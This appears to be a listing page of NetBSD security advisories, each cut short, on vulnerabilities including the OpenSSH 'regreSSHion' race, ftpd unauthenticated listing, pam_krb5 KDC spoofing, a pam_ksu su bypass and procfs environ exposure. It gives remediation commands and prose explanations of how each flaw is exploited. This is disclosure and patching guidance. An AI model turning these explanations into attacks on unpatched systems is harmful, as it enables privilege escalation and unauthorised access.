NetBSD Security Advisory 2024-002: OpenSSH CVE-2024-6387 `regreSSHion'
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2024-002 = Topic: OpenSSH CVE-2024-6387 `regreSSHion' Version:NetBSD-current: affected prior to 2024-07-02 NetBSD 10.0:affected NetBSD 9.4: affected pkgsrc: affected prior to openssh-9.8p1 Severity: Remote code execution in sshd(8) Fixed: NetBSD-current: 2024-07-01 NetBSD-10 branch: 2024-07-01 NetBSD-9 branch:2024-07-01 pkgsrc-current: 2024-07-01 pkgsrc-2024Q2: 2024-07-02 Please note that NetBSD releases prior to 9.4 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract The sshd(8) login grace time expiry message is issued from signal handler context where it is not safe and may cause heap corruption, potentially leading to remote code execution. This vulnerability has been assigned CVE-2024-6387. See https://www.qualys.com/regresshion-cve-2024-6387/ for more information. Technical Details = The sshd(8) LoginGraceTime option sets the maximum time that sshd(8) will wait before a new connection attempts to authenticate, to mitigate denial of service attacks. If set to zero, there is no maximum time. The option is implemented in sshd(8) by a SIGALRM handler. The SIGALRM handler logs a message with syslog_r(3), formatted to be safe for terminals with strnvis(3). Both of these library routines may call malloc(3), which is not async-signal-safe. If the SIGALRM is delivered while another part of sshd(8) is interrupted in during a malloc(3) call (or a related function such as calloc(3) or free(3)), this can corrupt malloc's internal data structures, which can lead to remote code execution. Solutions and Workarounds = Workaround: Set LoginGraceTime 0 in the sshd_config(5) file. This prevents the heap corruption vulnerability. However, it may allows denial of service attacks against sshd(8) by clients that open connections and idle forever without authenticating. Alternative workaround: Install security/openssh from pkgsrc and switch to the pkgsrc version. To apply a fixed version from a releng build, fetch a fitting base.tgz or base.tar.xz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.SUFX cd / tar xzpf /var/tmp/base.SUFX /usr/lib/libssh.so.46.1 # netbsd-current tar xzpf /var/tmp/base.SUFX /usr/lib/libssh.so.46.1 # netbsd-10 tar xzpf /var/tmp/base.SUFX /usr/lib/libssh.so.34.0 # netbsd-9 with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20240702* and later will fit ARCH = your system's architecture SUFX = tgz or tar.xz depending on architecture The following instructions describe how to upgrade your OpenSSH binaries by updating your source tree and rebuilding and installing a new version of libssh. * NetBSD-current: Systems running NetBSD-current dated from before 2024-07-01 should be upgraded to NetBSD-current dated 2024-07-02 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): crypto/external/bsd/openssh/dist/log.c To update from CVS, re-build, and re-install libssh: # cd src # cvs update -d -P crypto/external/bsd/openssh/dist # cd crypto/external/bsd/openssh/lib # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 10.*: Systems running NetBSD 10.* sources dated from before 2024-07-01 should be upgraded from NetBSD 10.* sources dated 2024-07-02 or later. The following files/directories need to be updated from the netbsd-10 branch: crypto/external/bsd/openssh/dist/log.c To update from CVS, re-build, and re-install libssh: # cd src # cvs update -r netbsd-10 -d -P crypto/external/bsd/openssh/dist # cd crypto/external/bsd/openssh/lib # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 9.*: Systems running NetBSD 9.* sources dated from before 2024-07-01 should be upgraded from NetBSD 9.* sources dated 2024-07-02 or later. The following files/directories need to be updated from the netbsd-9 branch: crypto/external/bsd/openssh/dist/log.c To update from CVS, re-build, and re-install libssh: # cd src # cvs update -r netbsd-9 -d -P crypto/external/bsd/openssh/dist
NetBSD Security Advisory 2024-001: Inadequate validation of user-supplied hostname in utmp_update(8)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2024-001 = Topic: Inadequate validation of user-supplied hostname in utmp_update(8) Version:NetBSD-current: affected prior to 2023-09-30 NetBSD 10.0_RC4:affected NetBSD 9.3: affected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: Possibility of injecting arbitrary characters to the utmp logs including terminal escape sequences. Fixed: NetBSD-current: 2023-09-30 NetBSD-10 branch: 2024-02-17 NetBSD-9 branch:2024-02-17 NetBSD-8 branch:2024-02-17 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract utmp_update(8) is a helper program that allows users to update theirs utmpx(5) entries. An identified vulnerability reveals inadequate validation of user-supplied data, enabling malicious entities to inject arbitrary information. Technical Details = The issue allows malicious users to inject arbitrary data into utmpx(5) database due to the absence of proper filters for provided hostnames. The behaviour can be exploited by the attackers to force tools which display hostnames from utmpx(5) databases such us w(1) or who(1), to unexpectedly inject escape sequences into terminal of the user invoking the program. While this vulnerability does not pose a direct threat to the system's core operations, it can be leveraged indirectly to disrupt accurate system logging, compromise terminal interfaces, and facilitate social engineering attacks by displaying arbitrary content in the terminals of unsuspecting victims The utmp_update(8) utility was fixed by introducing a filter which accepts only printable characters in the hostnames. Solutions and Workarounds = It is suggested to install new version of the utmp_update(8) utility. To apply a fixed version from a releng build, fetch a fitting base.tgz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/libexec/utmp_update with the following replacements: REL = the release version you are using BUILD = the source date of the build. %DATE%* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your utmp_update(8) binaries by updating your source tree and rebuilding and installing a new version of utmp_update(8). * NetBSD-current: Systems running NetBSD-current dated from before 2023-09-30 should be upgraded to NetBSD-current dated 2023-10-01 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): src/libexec/utmp_update/utmp_update.c To update from CVS, re-build, and re-install utmp_update(8): # cd src # cvs update -d -P src/libexec/utmp_update/ # cd src/libexec/utmp_update/ # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 9.*: Systems running NetBSD 9.* sources dated from before 2024-02-17 should be upgraded from NetBSD 9.* sources dated 2024-02-18 or later. The following files/directories need to be updated from the netbsd-9 branch: path/to/files To update from CVS, re-build, and re-install utmp_update(8): # cd src # cvs update -r netbsd-9 -d -P src/libexec/utmp_update/ # cd src/libexec/utmp_update/ # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 8.*: Systems running NetBSD 8.* sources dated from before 2024-02-17 should be upgraded from NetBSD 8.* sources dated 2024-02-18 or later. The following files/directories need to be updated from the netbsd-8 branch: path/to/files To update from CVS, re-build, and re-install utmp_update(8): # cd src # cvs update -r netbsd-8 -d -P src/libexec/utmp_update/ # cd src/libexec/utmp_update/ # make USETOOLS=no cleandir dependall # make USETOOLS=no install Thanks To = Adam Simuntis (https://twitter.com/adamsimuntis) for finding and reporting the issue. Christos Zoulas (christos@) for fixing the issue. Revision History
NetBSD Security Advisory 2023-007: multiple vulnerabilities in ftpd(8)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-007 = Topic: multiple vulnerabilities in ftpd(8) Version:NetBSD-current: affected prior to 2023-10-01 NetBSD 10.0_BETA: affected prior to 2023-10-01 NetBSD 9.3: affected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected tnftpd: prior to tnftpd-20231001 Severity: Remote unauthenticated attacker may get directory listing, potential buffer overflows. Fixed: NetBSD-current: 2023-09-30 NetBSD-10 branch: 2023-10-02 NetBSD-9 branch:2023-10-02 NetBSD-8 branch:2023-10-03 tnftpd: tnftpd-20231001 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A vulnerability in the NetBSD FTP server allows unauthenticated users to execute MLST and MLSD commands without authentication. This can lead to information leakage - unauthorized party may be able to download the listing of the current ftpd(8) directory. This vulnerability has been assigned CVE-2023-45198. Additionally, potential buffer overflow in count_users() and reading outside of allocated memory issues due to wrong struct type used in the pam_set_item() call have been identified. Technical Details = The NetBSD FTP server had a security flaw that allowed unauthenticated users to execute MLST and MLSD commands without requiring proper authentication. This could enable unauthorized users to retrieve directory listings and information about files on the server, potentially leading to an information leak. It should be noted that MLST and MLSD commands can be executed by unauthenticated user, it allows attacker to operate only on the current directory of the ftpd(8) process. Another issue is associated with count_users() function which potentially used uninitialized memory. If the file was previously empty, pids table used by the daemon is not set, the code however used pids[0] which is uninitialized in this case. In some scenarios it may lead to propagate garbage value from pids[0] to the file and cause writing outside of allocated memory. Additionally two other weaknesses have been identified. pam_set_item used with the PAM_SOCKADDR option expects sockaddr_storage structure. Instead, internal struct sockinet was used. Because it's length is shorter than sockaddr_storage, libpam was copying also memory outside of sockinet struct. Solutions and Workarounds = As a temporary workaround, ftpd(8) might be disabled. To apply a fixed version from a releng build, fetch a fitting base.tgz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz tar -C / -xzpf /var/tmp/base.tgz ./usr/libexec/ftpd with the following replacements: REL = the release version you are using BUILD = the source date of the build. %DATE%* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your ftpd(8) binaries by updating your source tree and rebuilding and installing a new version of ftpd(8). * NetBSD-current: Systems running NetBSD-current dated from before 2023-09-30 should be upgraded to NetBSD-current dated 2023-10-01 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): src/libexec/ftpd To update from CVS, re-build, and re-install ftpd(8): # cd src # cvs update -d -P src/libexec/ftpd # cd src/libexec/ftpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 9.*: Systems running NetBSD 9.* sources dated from before 2023-10-02 should be upgraded from NetBSD 9.* sources dated 2023-10-03 or later. The following files/directories need to be updated from the netbsd-9 branch: src/libexec/ftpd To update from CVS, re-build, and re-install ftpd(8): # cd src # cvs update -r netbsd-9 -d -P src/libexec/ftpd # cd src/libexec/ftpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 8.*: Systems running NetBSD 8.* sources dated from before 2023-10-03 should be upgraded from NetBSD 8.* sources dated 2013-10-04
NetBSD Security Advisory 2023-006: KDC-spoofing in pam_krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-006 = Topic: KDC-spoofing in pam_krb5 Version:NetBSD-current: affected prior to 2023-06-20 NetBSD 10.0_BETA: affected prior to 2023-06-21 NetBSD 9.3: affected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: Remote attacker may be able to log in as any user Fixed: NetBSD-current: 2023-06-20 NetBSD-10 branch: 2023-06-21 NetBSD-9 branch:2023-06-21 NetBSD-8 branch:2023-06-21 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract On a NetBSD system with: - - ftpd, sshd, or some other network services enabled with default configuration, and - - /etc/krb5.conf created (possibly an empty file), an adversary on the network can log in as any user via pam_krb5 by spoofing a Kerberos KDC (Key Distribution Center) on the network, bypassing Kerberos's normal cryptographic verification methods. NetBSD installations without /etc/krb5.conf (the default) are not affected. This vulnerability has been assigned CVE-2023-3326. Technical Details = Normally, Kerberos works like this: 1. An organization is named by a realm like EXAMPLE.COM and has a server called a KDC storing secrets shared with all users and services in the organization. 2. Each user and service is identified by a `principal name' like u...@example.com or imap/mail.example@example.com. 3. Each principal (user or service) has a secret shared with the KDC: . passwords, for users; . random keys, for services, stored in a file called a `keytab' with the service. 4. To log in as a user, you run `kinit u...@example.com' and enter your password. kinit(1) talks to the KDC to get a `ticket-granting ticket' (tgt) which is typically good for 10h or 24h, so you only have to do this once per day to get access to any services as a single-sign-on (SSO) system. In this process, the KDC and kinit(1) use your password in a cryptographic protocol to authenticate one another -- if you enter the wrong password, or if the KDC is actually spoofed and doesn't know your password, kinit(1) fails to obtain a tgt. 5. To use a service like IMAP at mail.example.com: (a) your mail reader requests a service ticket for imap/mail.example@example.com from the KDC using the tgt, (b) your mail reader sends the service ticket to mail.example.com, (c) mail.example.com uses its keytab to verify the service ticket came from the legitimate KDC before letting you read your mail. pam_krb5 is an authentication module that verifies a password on behalf of login programs like sshd and xdm. It works by effectively running kinit(1) with the password, and getting a tgt from the KDC, as a way to verify the password. - - For local logins, like xdm, pam_krb5 incorporates the single-sign-on aspect of Kerberos into the local login prompt, so users can proceed to use the tickets obtained by pam_krb5 for applications in their login session. - - For logins from remote users, like sshd, pam_krb5 serves as a fallback for users who are familiar with passwords, but are unfamiliar with Kerberos or the normal kinit(1) path. (Note: pam_krb5 is not for normal Kerberos authentication in sshd -- for that, you must set `GSSAPIAuthentication yes' in /etc/ssh/sshd_config.) If there is a keytab, pam_krb5 also uses the tgt to get a service ticket and verifies the service ticket with the keytab. But without a keytab, the only way pam_krb5 can verify the KDC's response and get a tgt is with the password, and yet pam_krb5's job is to verify the password with a tgt. If both the password _and_ the KDC are controlled by an adversary, the adversary can provide a password that the adversary's spoofed KDC will return a valid tgt for. Currently, without a keytab, pam_krb5 is vulnerable to this attack. pam_krb5 is not necessary for you to use Kerberos just for client-side SSO, but to use that, you need to create an /etc/krb5.conf (which may be empty) before kinit(1) and any kerberized client software like Thunderbird or Firefox will use Kerberos. Creating /etc/krb5.conf -- even an empty file -- has the side effect of enabling pam_krb5, which is on by default in /etc/pam.d for system, ftpd, display_manager, and sshd. Even if /etc/krb5.conf is empty and doesn't specify a default realm or KDC, pam_krb5 will attempt to discover the realm and KDC
NetBSD Security Advisory 2023-005: su(1) bypass via pam_ksu(8)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-005 = Topic: su(1) bypass via pam_ksu(8) Version:NetBSD-current: affected prior to 2023-06-20 NetBSD 10.0_BETA: affected prior to 2023-06-21 NetBSD 9.3: affected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: Local privilege escalation Fixed: NetBSD-current: 2023-06-20 NetBSD-10 branch: 2023-06-21 NetBSD-9 branch:2023-06-21 NetBSD-8 branch:2023-06-21 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An unprivileged user can bypass su(1) security checks by exploiting a flaw in the PAM module pam_ksu(8), which is supposed to authenticate the user by checking their Kerberos password. Technical Details = On a system configured to use Kerberos, pam_ksu(8) is supposed to authenticate an unprivileged user calling su(1) by prompting for the user's Kerberos password, obtaining Kerberos tickets from the Kerberos realm's KDC with the user's password, and verifying the user's tickets with a secret keytab. On a system not configured to use Kerberos, pam_ksu(8) is supposed to fail harmlessly when it sees that /etc/krb5.conf does not exist. However, the update to Heimdal 7.1 inadvertently lost a set-user-id context check that pam_ksu(8) relied on to sanitize its context, and so it would consult ~/.krb5/config for Kerberos configuration, whether or not /etc/krb5.conf exists, in spite of being in a dangerous set-user-id context. This allows the user calling su(1) to completely control pam_ksu's logic, by specifying a default realm, a KDC for the realm, and the location of the keytab that pam_ksu(8) is to consult for a secret key shared with the KDC that it uses to verify the user's tickets. By simply running a KDC, possibly even on the same host on a nonstandard port number, the user calling su(1) can convince pam_ksu(8) to succeed. Solutions and Workarounds = Workaround: Disable pam_ksu(8) in /etc/pam.d/su by adding a single `#' character at the start of the line where pam_ksu appears, in order to comment it out. To apply a fixed version from a releng build, fetch a fitting base.tgz or base.tar.xz from nycdn.NetBSD.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tar.xz cd / tar xzpf /var/tmp/base.tar.xz ./usr/lib/security/pam_ksu.so.4 with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20230621* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your pam_ksu(8) binaries by updating your source tree and rebuilding and installing a new version of pam_ksu(8). * NetBSD-current: Systems running NetBSD-current dated from before 2023-06-21 should be upgraded to NetBSD-current dated 2023-06-22 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): lib/libpam/modules/pam_ksu/pam_ksu.c To update from CVS, re-build, and re-install pam_ksu: # cd src # cvs update -d -P lib/libpam/modules/pam_ksu/pam_ksu.c # cd lib/libpam/modules/pam_ksu # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 10.*: Systems running NetBSD 10.* sources dated from before 2023-06-21 should be upgraded from NetBSD 9.* sources dated 2023-06-22 or later. The following files/directories need to be updated from the netbsd-10 branch: lib/libpam/modules/pam_ksu/pam_ksu.c To update from CVS, re-build, and re-install pam_ksu: # cd src # cvs update -r netbsd-10 -d -P lib/libpam/modules/pam_ksu/pam_ksu.c # cd lib/libpam/modules/pam_ksu # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 9.*: Systems running NetBSD 9.* sources dated from before 2023-06-21 should be upgraded from NetBSD 9.* sources dated 2023-06-22 or later. The following files/directories need to be updated from the netbsd-9 branch: lib/libpam/modules/pam_ksu/pam_ksu.c To update from CVS, re-build, and re-install pam_ksu: #
NetBSD Security Advisory 2023-004: procfs environ exposure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-004 = Topic: procfs environ exposure Version:NetBSD-current: affected prior to 9.99.78 NetBSD 10.0_BETA: unaffected NetBSD 9.3: unaffected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: unaffected NetBSD 8.1: unaffected NetBSD 8.0: unaffected Severity: Secret disclosure across privilege boundaries Fixed: NetBSD-current: 2020-12-28 NetBSD-10 branch: N/A NetBSD-9 branch:2022-06-17 NetBSD-8 branch:N/A Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract /proc/N/environ was world-readable, enabling anyone to read other processes' environments even across privilege boundaries. This can expose secrets, since the process environment is often used to hold things like secret access keys. Technical Details = When procfs is mounted at /proc, the process environment (environ(7)) for the process with pid N is exposed as /proc/N/environ. The process environment is often used to transmit secrets such as secret access keys: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html Normally a process's environment is exposed only to that process and to other processes with the same privileges -- one user cannot read the environment of another user's process, for example with the `-e' option to ps(1). However, procfs exposed the /proc/N/environ with group and other read permission, allowing any user's process on the system to read any other process's environment, potentially disclosing secrets across privilege boundaries. Solutions and Workarounds = Workaround: Avoid mounting procfs. If you need to mount procfs, update the kernel to a fixed version and reboot. There are pre-built binaries for all architectures and NetBSD versions at: https://nycdn.netbsd.org/pub/NetBSD-daily/ For example you can find the standard GENERIC kernel for NetBSD-9/amd64 at: https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz Alternatively to build from source for all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/miscfs/procfs/procfs_vfsops.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Maya Rashish for finding the bug. Revision History 2023-06-28 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2023, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2023-004.txt,v 1.1 2023/06/28 15:33:18 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmScUr8cHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/yXzD/9gO9YosHsm4ILgcj4b IPxgTjx0UHvY36Q0QSo+XjJm+de0OeLayd5hHo2sWycrGSbJXap543ac1/x1FlbL c7CpcrdmWzZOGAYVBbV5Mb0UQkFiVreiIX7/haw/Rx6GFmI8FCCBCfjjDBhOKGOl N6cPNnywlT6+DYjrwXkqKfX8clv9cAaeNQf/e2m7P4DXzgEAkcpNmroGebzrzDMP Acqf1Fmdf5atGaTiORINhtT2wJebl0Ev2KU5vojIHT/my8ojyiDQPatIlZNl0NA3 R1xotCBrpFai2tZeFwppdYTdxFA4RW/JYm9f69rVCMi3BgnoA3X2+gie3it8I7gI 9DQP2dXbSHtDUaVVRGjr5/cC25T9Gclcg5oC5mmHj8HC6MrtItEO5vX6fl64jg36 n4vZ8XxYTxX01Pi1oz6AIh5x5XybvvwKYqWV3hw5s+YvBXsZ9KFRIl/TUyTO8I5T MUCgB3tEqcO86yJNV5gDnwqmL4D0hsVkN4c+MPHvoQO4nT6oQEa7ggNpz1ZoOR0J e3BlI3PqQ8XZyBPwrc+tF8moYMkmlH1OxXN/wiRZojCyKTHqUTPW0l2fjmT+l5y1 Y8W5sRu7s2yhbIC7O77nfRYZKLShjmJIw3/wldbcS+aN5zQXxY1JnAFVqszLRIvZ I/AmJ6SncGpNSW/ADDwwk71TjQ==
NetBSD Security Advisory 2023-003: Structure padding memory disclosures
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-003 = Topic: Structure padding memory disclosures Version:NetBSD-current: affected prior to 2021-09-09 NetBSD 10.0_BETA: unaffected NetBSD 9.3: unaffected NetBSD 9.2: affected NetBSD 9.1: affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: Kernel memory disclosure Fixed: NetBSD-current: 2021-09-09 NetBSD-10 branch: N/A NetBSD-9 branch:2022-08-03 NetBSD-8 branch:2023-06-21 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Many system calls can disclose kernel memory due to structure padding. Technical Details = Many system that return structured data only initialized the fields of those structures resulting in uninitialized memory bytes where padding was added by the compiler for alignment purposes. These uninitialized bytes contain random kernel memory data from the stack, which was copied to userland. Solutions and Workarounds = There are pre-built binaries for all architectures and NetBSD versions at: https://nycdn.netbsd.org/pub/NetBSD-daily/ For example you can find the standard GENERIC kernel for NetBSD-9/amd64 at: https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz Alternatively to build from source for all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -dP src/sys # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Trend Micro for reporting the bug for the stat conversion functions and Taylor Campbell for auditing the kernel for more instances. Revision History 2023-06-28 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://cdn.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2023-NNN.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2023, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2023-003.txt,v 1.1 2023/06/28 15:32:44 christos Exp $ -BEGIN PGP SIGNATURE- iQJQBAEBCAA6FiEEJxEzJivzXLUNT1BGiSYeF/XvSf8FAmScUp0cHHNlY3VyaXR5 LW9mZmljZXJAbmV0YnNkLm9yZwAKCRCJJh4X9e9J/zbMD/9+qgIOswCLofrvCtz3 DpRrJEPM01TN1ZDZKVdRlV8Y9v3xKsrm6usiDmNzb238L8c++xbGSeDJD8zJB8LF zrecGdSLUl+ztPs7tnEm7JNx6EEFAXAWQ5Sbdd7bN66R0M+1+ohhVQkWZHtGIvjU EiNiMDLN2PYVUQpfVihXZUNk8AcerBfvFKOZ5vfrhiqFWokWv+9SeyrF5zJt6hyT wUuoS7PqJAUZ7eIw21jh9R7ijOQm83sdKe50JeXlia5Djdigzq6vqMk4d1JHm4xi CBBHadachCVBUPzO0xURaSe5+3pvD0+8ZnqqjUwqrfQQa/QkfYaA8u+nFgqhC0PZ Se5Jzm4BKLVBMWIEEf60LGpN+J/CRgu9OFwIAEtZFhH8aUsUjkYBQkGO6nrZdmtf HfyH6UKcOBYrT+FWVpjH2P+ZpHTaeZPadZMQHfZeNCIoQlHkuq4NKVxBVQM0e+18 A1sO14tMY2GQi3nds2reEnNuru4kPlhSQnm1H4rjA3Bg+3hwFCGOB5kSZRRg9oZS KxfLsehh0VDllXPKlQvrhdL+62KYPJWPq+u3w5f0YJUhdMApvURRmZuAMFpARFRG k8cC51cMEKzvHpBEoN6DV22GT/fRZ/j6gvU6u/q1eC6OsFnsKXO5JhcvkU+MCysH YbcR2Ko3ZcrFLimSv6FxfeEkGQ== =gG7S -END PGP SIGNATURE-
NetBSD Security Advisory 2023-002: Various compatibility syscall memory access issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2023-002 = Topic: Various compatibility syscall memory access issues Version:NetBSD-current: affected before 2020-05-15 NetBSD 10.0_BETA: not affected NetBSD 9.3: not affected NetBSD 9.2: not affected NetBSD 9.1: not affected NetBSD 9.0: affected NetBSD 8.2: affected NetBSD 8.1: affected NetBSD 8.0: affected Severity: Local users can crash the machine Fixed: NetBSD-current: 2020-05-15 NetBSD-10 branch: N/A NetBSD-9 branch:2020-05-15 NetBSD-8 branch:2020-05-25 Please note that NetBSD releases prior to 8.2 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Fix various info leaks, out of bound access, usage of uninitialized values and direct access to userland variables from kernel space and memory leaks in system calls implemented for the compatibility subsystems. These bugs affect: - compat_netbsd32 - compat_linux - compat_linux32 Technical Details = The following bugs were discovered using memory and address sanitizers: - - Index out of bounds (kernel crash) https://mail-index.netbsd.org/source-changes/2019/08/23/msg108420.html - - Incorrect buffer handling (memory corruption) https://mail-index.netbsd.org/source-changes/2019/08/24/msg108454.html https://mail-index.netbsd.org/source-changes/2020/03/14/msg115069.html [*] - - Missing free of temporary buffer (memory leak) https://mail-index.netbsd.org/source-changes/2019/08/24/msg108455.html - - Bugs in the implementation of linux32_sys_get_robust_list (missing functionality) https://mail-index.netbsd.org/source-changes/2019/08/23/msg108428.html - - Direct user data access (not working with SMAP) https://mail-index.netbsd.org/source-changes/2019/08/24/msg108449.html - - Incorrect error code returned (diagnostic) https://mail-index.netbsd.org/source-changes/2019/08/23/msg108425.html - - Insufficient zero initialization of arguments to compatibility syscalls (information leak) https://mail-index.netbsd.org/source-changes/2020/01/01/msg112486.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108407.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108408.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108409.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108414.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108415.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108417.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108427.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108429.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108430.html https://mail-index.netbsd.org/source-changes/2020/02/22/msg114240.html [*] https://mail-index.netbsd.org/source-changes/2020/02/26/msg114478.html [*] https://mail-index.netbsd.org/source-changes/2020/05/15/msg117350.html [**] - - Debug printing fixes (cosmetic) https://mail-index.netbsd.org/source-changes/2019/08/23/msg108421.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108426.html https://mail-index.netbsd.org/source-changes/2019/08/24/msg108456.html - - Uninitialized memory access (harmless) https://mail-index.netbsd.org/source-changes/2019/08/23/msg108423.html https://mail-index.netbsd.org/source-changes/2019/08/23/msg108424.html https://mail-index.netbsd.org/source-changes/2019/09/08/msg108869.html https://mail-index.netbsd.org/source-changes/2020/04/19/msg116378.html [*] https://mail-index.netbsd.org/source-changes/2020/05/14/msg117328.html [*] - - Incorrect size passed to copyin (harmless stack buffer overflow) https://mail-index.netbsd.org/source-changes/2020/01/01/msg112456.html Solutions and Workarounds = Update the kernel to a fixed version and reboot. There are pre-built binaries for all architectures and NetBSD versions at: https://nycdn.netbsd.org/pub/NetBSD-daily/ For example you can find the standard GENERIC kernel for NetBSD-9/amd64 at: https://nycdn.netbsd.org/pub/NetBSD-daily/netbsd-9/latest/amd64/binary/kernel/netbsd-GENERIC.gz Alternatively to build from source for all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize
NetBSD Security Advisory 2023-001: Multiple buffer overflows in USB drivers
